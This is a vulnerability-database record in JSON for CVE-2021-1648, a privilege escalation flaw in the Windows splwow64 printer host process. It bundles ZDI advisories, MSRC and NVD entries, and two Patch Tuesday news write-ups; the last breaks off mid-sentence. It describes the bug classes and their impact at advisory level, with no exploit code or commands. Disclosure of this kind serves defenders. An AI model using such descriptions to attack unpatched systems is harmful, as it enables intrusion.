This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.
{"id": "ZDI-21-504", "vendorId": null, "type": "zdi", "bulletinFamily": "info", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "published": "2021-05-03T00:00:00", "modified": "2021-05-03T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-504/", "reporter": "Elliot Cao (@iamelli0t) working 
with Trend Micro's Zero Day Initiative", "references": ["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1648"], "cvelist": ["CVE-2021-1648"], "immutableFields": [], "lastseen": "2022-02-10T00:00:00", "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "cve", "idList": ["CVE-2021-1648"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "kaspersky", "idList": ["KLA12045"]}, {"type": "krebs", "idList": ["KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1648"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JAN_4598229.NASL", "SMB_NT_MS21_JAN_4598230.NASL", "SMB_NT_MS21_JAN_4598231.NASL", "SMB_NT_MS21_JAN_4598242.NASL", "SMB_NT_MS21_JAN_4598243.NASL", "SMB_NT_MS21_JAN_4598245.NASL", "SMB_NT_MS21_JAN_4598275.NASL", "SMB_NT_MS21_JAN_4598278.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3"]}, {"type": "thn", "idList": ["THN:9CF96D7230D0DBA395C1DEDA718226AD"]}, {"type": "threatpost", "idList": ["THREATPOST:B879E243998561911585BBD37B7F33E9"]}, {"type": "zdi", "idList": ["ZDI-20-1432", "ZDI-20-1433", "ZDI-20-1434", "ZDI-21-020", "ZDI-21-022", "ZDI-21-024", "ZDI-21-078"]}], "rev": 4}, "score": {"value": 4.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "cve", "idList": ["CVE-2021-1648"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "kaspersky", "idList": ["KLA12045"]}, {"type": "krebs", "idList": 
["KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1648"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JAN_4598230.NASL", "SMB_NT_MS21_JAN_4598242.NASL", "SMB_NT_MS21_JAN_4598243.NASL", "SMB_NT_MS21_JAN_4598278.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3"]}, {"type": "thn", "idList": ["THN:9CF96D7230D0DBA395C1DEDA718226AD"]}, {"type": "threatpost", "idList": ["THREATPOST:B879E243998561911585BBD37B7F33E9"]}, {"type": "zdi", "idList": ["ZDI-20-1432", "ZDI-20-1433", "ZDI-20-1434", "ZDI-21-020", "ZDI-21-022", "ZDI-21-024", "ZDI-21-078"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-1648", "epss": "0.000520000", "percentile": "0.185370000", "modified": "2023-03-16"}], "vulnersScore": 4.7}, "_state": {"dependencies": 1647589307, "score": 1659749172, "epss": 1679070268}}
{"zdi": [{"lastseen": "2022-01-31T21:56:20", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-15T00:00:00", "type": "zdi", "title": "(0Day) Microsoft Windows splwow64 Untrusted Pointer Dereference Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2020-12-15T00:00:00", "id": "ZDI-20-1434", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1434/", "cvss": {"score": 7.2, 
"vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:56:22", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-08T00:00:00", "type": "zdi", "title": "(0Day) Microsoft Windows splwow64 Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-08T00:00:00", "id": "ZDI-20-1433", "href": 
"https://www.zerodayinitiative.com/advisories/ZDI-20-1433/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:56:22", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-15T00:00:00", "type": "zdi", "title": "(0Day) Microsoft Windows splwow64 Out-Of-Bounds Write Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2020-12-15T00:00:00", "id": "ZDI-20-1432", 
"href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1432/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:29:12", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-06-29T00:00:00", "id": "ZDI-21-022", "href": 
"https://www.zerodayinitiative.com/advisories/ZDI-21-022/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:29:11", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-14T00:00:00", "id": "ZDI-21-024", 
"href": "https://www.zerodayinitiative.com/advisories/ZDI-21-024/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:29:16", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-14T00:00:00", "id": 
"ZDI-21-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-020/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:28:45", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-21T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-21T00:00:00", 
"id": "ZDI-21-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-078/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-03-17T02:34:50", "description": "Microsoft splwow64 Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T08:00:00", "type": "mscve", "title": "Microsoft splwow64 Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1648", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:02:53", "description": "Microsoft splwow64 Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, 
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "type": "cve", "title": "CVE-2021-1648", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2022-07-21T13:43:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-1648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1648", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2021-01-15T00:26:33", "description": "This month\u2019s Microsoft Patch Tuesday addresses 83 vulnerabilities. The 10 Critical vulnerabilities cover Windows codecs, Office, HEVC video extensions, RPC runtime, and several other workstation vulnerabilities. Adobe released patches today for Photoshop, Campaign Classic, InCopy, Illustrator, Captivate, Bridge and Animate.\n\n### Workstation Patches\n\nOffice and Edge vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used to access email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Defender RCE Zero Day\n\nMicrosoft patches Defender Remote Code Execution vulnerability ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in today's patch release for Microsoft Malware Protection Engine. Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized.\n\n### splwow64 Elevation of Privilege\n\nWhile Microsoft labeled this issue ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) as an elevation-of-privilege vulnerability, it can also be exploited to disclose information, specifically uninitialized memory. 
Microsoft stated the vulnerability has not been exploited in the wild, although details are available publicly.\n\n### Windows Kernel Local Elevation of Privilege\n\nMicrosoft updated [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>) for Windows Server 2012 in today's Patch Tuesday, and users are recommended to apply today's patches for Windows Server 2012.\n\nWe appreciate Microsoft's acknowledgement of our co-ordinated disclosure of the underlying regression in the Windows Server 2012 version of this security update.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb21-01.html>), [Illustrator](<https://helpx.adobe.com/security/products/photoshop/apsb21-02.html>), [Animate](<https://helpx.adobe.com/security/products/photoshop/apsb21-03.html>), [Campaign](<https://helpx.adobe.com/security/products/photoshop/apsb21-04.html>), [InCopy,](<https://helpx.adobe.com/security/products/photoshop/apsb21-05.html>) [Captivate](<https://helpx.adobe.com/security/products/photoshop/apsb21-06.html>) and [Bridge](<https://helpx.adobe.com/security/products/photoshop/apsb21-07.html>). 
The patches for Adobe Campaign are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be actively attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-01-12T20:01:43", "type": "qualysblog", "title": "January 2021 Patch Tuesday \u2013 83 Vulnerabilities, 10 Critical, One Zero Day, Adobe", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-17087", "CVE-2021-1647", "CVE-2021-1648"], "modified": "2021-01-12T20:01:43", "id": "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:38", "description": "[](<https://thehackernews.com/images/-cZjUACk7bgA/X_5-UYTlv-I/AAAAAAAABec/V3IW_ZyIh9k3keOxtl2lI0PDNAaEMTRQACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nFor the first patch Tuesday of 2021, Microsoft released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>) addressing a total of 83 flaws spanning as many as 11 products and services, including an actively exploited zero-day vulnerability.\n\nThe latest security patches cover Microsoft Windows, Edge browser, ChakraCore, Office and Microsoft Office Services, and Web Apps, Visual Studio, Microsoft Malware Protection Engine, .NET Core, ASP .NET, and Azure. 
Of these 83 bugs, 10 are listed as Critical, and 73 are listed as Important in severity.\n\nThe most severe of the issues is a remote code execution (RCE) flaw in Microsoft Defender ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) that could allow attackers to infect targeted systems with arbitrary code.\n\nMicrosoft Malware Protection Engine (mpengine.dll) provides the scanning, detection, and cleaning capabilities for Microsoft Defender antivirus and antispyware software. The last version of the software affected by the flaw is 1.1.17600.5, before it was addressed in version 1.1.17700.4.\n\nThe bug is also known to have been actively exploited in the wild, although details are scarce on how widespread the attacks are or how this is being exploited. It's also a zero-click flaw in that the vulnerable system can be exploited without any interaction from the user.\n\nMicrosoft said that despite active exploitation, the technique is not functional in all situations and that the exploit is still considered to be at a proof-of-concept level, with substantial modifications required for it to work effectively.\n\nWhat's more, the flaw may already be resolved as part of automatic updates to the Malware Protection Engine \u2014 which it typically releases once a month or as when required to safeguard against newly discovered threats \u2014 unless the systems are not connected to the Internet.\n\n\"For organizations that are configured for automatic updating, no actions should be required, but one of the first actions a threat actor or malware will try to attempt is to disrupt threat protection on a system so definition and engine updates are blocked,\" said Chris Goettl, senior director of product management and security at Ivanti.\n\nTuesday's patch also rectifies a privilege escalation flaw ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) introduced by a previous patch in the GDI 
Print / Print Spooler API (\"splwow64.exe\") that was [disclosed by Google Project Zero](<https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html>) last month after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOther vulnerabilities fixed by Microsoft include a memory corruption flaw in Microsoft Edge browser ([CVE-2021-1705](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1705>)), a Windows Remote Desktop Protocol Core Security feature bypass flaw ([CVE-2021-1674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1674>), CVSS score 8.8), and five critical RCE flaws in Remote Procedure Call Runtime.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or select Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), 